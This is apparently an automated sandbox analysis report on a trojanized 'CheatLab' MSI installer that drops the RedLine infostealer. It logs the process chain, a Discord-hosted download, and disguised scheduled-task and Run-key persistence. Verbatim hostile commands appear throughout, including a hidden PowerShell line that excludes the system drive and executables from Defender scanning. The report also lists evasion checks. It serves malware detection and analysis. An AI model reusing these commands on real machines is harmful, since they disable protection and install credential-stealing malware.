            GET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1
            User-Agent: Sun
            Cache-Control: no-cache
            Host: cdn.discordapp.com
            Connection: Keep-Alive
            Cookie: __cf_bm=kCi2GYOZeYHyA10sUg_bOGn89f2AWCraeEUmTMI9E1Y-1699057815-0-Ae7NdqYh6y4Vn05KJQP1pqOYfL0VjeRaSbco9oI2dfRUDSdYbfh+TLhUFMMvRdmJhd3Po/8vja/n0aNCiZvYc6w=; _cfuvid=s5rVrnaiMIWihEPRd4K_XSgaFFGJdcRN_pQvtzzHOtQ-1699057815839-0-604800000
          Source: global traffic HTTP traffic detected:
            GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
            Content-Type: application/json
            User-Agent: Sun
            Host: ip-api.com
            Cache-Control: no-cache
          Source: global traffic HTTP traffic detected:
            GET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1
            Content-Type: application/json
            User-Agent: Sun
            Host: cdn.discordapp.com
            Cache-Control: no-cache
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49716 version: TLS 1.2

          System Summary

          barindex
          Source: 21.2.connect.exe.20b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 21.2.connect.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile dump: connect.exe.11.dr 1070058901Jump to dropped file
          Source: 21.2.connect.exe.20b0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 21.2.connect.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 840
          Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI7AF2.tmp
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\51799a.msi
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 0040FD1C appears 48 times
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 004024E0 appears 67 times
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: String function: 00A63292 appears 70 times
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: String function: 00A63790 appears 39 times
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: String function: 00A6325F appears 103 times
          Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameviewer.exeF vs Cheat.Lab.2.7.1.msi
          Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs Cheat.Lab.2.7.1.msi
          Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs Cheat.Lab.2.7.1.msi
          Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameaischeduler.dllF vs Cheat.Lab.2.7.1.msi
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
          Source: connect.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\Installer\MSI7D5A.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi"
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 14B5C758307391A0BF1CDD495750E97E C
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 89A97588E5A998E3A3D91B47458C8C78
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 19958F299480DC364B0F0BF5C3172345 E Global\MSI0000
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI7D5A.tmp C:\Windows\Installer\MSI7D5A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:47 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua""
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
          Source: unknownProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: unknownProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 840
          Source: C:\Windows\Installer\MSI7D5A.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\OKKIBIRI.htm
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp
          Source: classification engineClassification label: mal44.troj.evad.winMSI@30/52@2/3
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A44BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,6_2_00A44BA0
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEEEE80 GetLastError,FormatMessageA,17_2_00007FF73AEEEE80
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A43860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,6_2_00A43860
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeMutant created: \Sessions\1\BaseNamedObjects\Sun711
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8016
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A445B0 LoadResource,LockResource,SizeofResource,6_2_00A445B0
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\CheatLab Corp
          Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
          Source: C:\Windows\System32\msiexec.exeAutomated click: Install
          Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: OK
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Cheat.Lab.2.7.1.msiStatic file information: File size 2820608 > 1048576
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI7D5A.tmp, 00000006.00000000.2063346881.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, MSI7D5A.tmp, 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, MSI7D5A.tmp.1.dr
          Source: Binary string: mscorlib.pdb source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI5E96.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI5E96.tmp.0.dr
          Source: Binary string: mscorlib.ni.pdb source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: mscorlib.pdb0 source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI7D5A.tmp, 00000006.00000000.2063346881.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, MSI7D5A.tmp, 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, MSI7D5A.tmp.1.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI7CBC.tmp.1.dr

          Data Obfuscation

          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
          Source: C:\Windows\Installer\MSI7D5A.tmp Code function: 6_2_00A6323C push ecx; ret 6_2_00A6324F
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe Code function: 17_2_00007FF73AE6499C push rbp; ret 17_2_00007FF73AE649D8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe Code function: 18_2_00007FF7B1DE499C push rbp; ret 18_2_00007FF7B1DE49D8
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 21_2_0040A888 push ecx; ret 21_2_0040A89B
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 21_2_0041E140 push eax; ret 21_2_0041E167
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 21_2_0040FD61 push ecx; ret 21_2_0040FD74
          Source: LuaJIT.exe.1.dr Static PE information: section name: _RDATA
          Source: NzEx.exe.11.dr Static PE information: section name: _RDATA
          Source: connect.exe.11.dr Static PE information: section name: .qbjfz
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 21_2_0041C000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,21_2_0041C000
          Source: NzEx.exe.11.dr Static PE information: real checksum: 0x124374 should be: 0x124384
          Source: LuaJIT.exe.1.dr Static PE information: real checksum: 0x124374 should be: 0x124384

          Persistence and Installation Behavior

          Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSI7D5A.tmp
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe File created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI92A9.tmp
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe File created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI92D9.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7BB0.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7CBC.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5EB6.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C0F.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7AF2.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7D5A.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5D78.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5E18.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5ED6.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5D99.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8673.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5DA9.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI5E96.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7B80.tmp

          Boot Survival

          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJIT
          Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Installer\MSI7D5A.tmp Process information set: NOGPFAULTERRORBOX
          Source: C:\Windows\Installer\MSI7D5A.tmp Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\msiexec.exe, System information queried: FirmwareTableInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220, Thread sleep count: 6776 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220, Thread sleep count: 1988 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252, Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe TID: 7404, Thread sleep count: 188 > 30
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe TID: 7404, Thread sleep time: -188000s >= -30000s
          Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_21-13368)
          Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI92A9.tmp
          Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Windows\Installer\MSI7BB0.tmp
          Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5D78.tmp
          Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5E18.tmp
          Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5ED6.tmp
          Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5D99.tmp
          Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5DA9.tmp
          Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Windows\Installer\MSI7B80.tmp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 6776
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 1988
          Source: C:\Windows\Installer\MSI7D5A.tmp, Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_6-33749)
          Source: C:\Windows\Installer\MSI7D5A.tmp, API coverage: 5.9 %
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, API coverage: 9.9 %
          Source: C:\Windows\System32\msiexec.exe, Process information queried: ProcessInformation
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A7AF79 FindFirstFileExW,6_2_00A7AF79
          Source: C:\Windows\System32\msiexec.exe, File Volume queried: C:\ FullSizeInformation
          Source: MSI5E96.tmp.0.dr, Binary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
          Source: MSI7D5A.tmp, 00000006.00000002.2085305629.0000000001349000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A4D0A5 IsDebuggerPresent,OutputDebugStringW,6_2_00A4D0A5
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: 21_2_0041C000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,21_2_0041C000
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A42310 GetProcessHeap,6_2_00A42310
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process token adjusted: Debug
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A72DCC mov ecx, dword ptr fs:[00000030h],6_2_00A72DCC
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A7AD78 mov eax, dword ptr fs:[00000030h],6_2_00A7AD78
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: 21_2_0041C000 mov edx, dword ptr fs:[00000030h],21_2_0041C000
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Memory allocated: page read and write | page guard
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A633A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00A633A8
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A6353F SetUnhandledExceptionFilter,6_2_00A6353F
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A62968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00A62968
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A66E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00A66E1B
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: 17_2_00007FF73AF0DBB8 SetUnhandledExceptionFilter,17_2_00007FF73AF0DBB8
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: 17_2_00007FF73AF0D9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF73AF0D9D4
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: 17_2_00007FF73AF0D0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF73AF0D0B0
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: 17_2_00007FF73AF38900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF73AF38900
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: 18_2_00007FF7B1E8D4C8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,18_2_00007FF7B1E8D4C8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: 18_2_00007FF7B1E8D9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF7B1E8D9D4
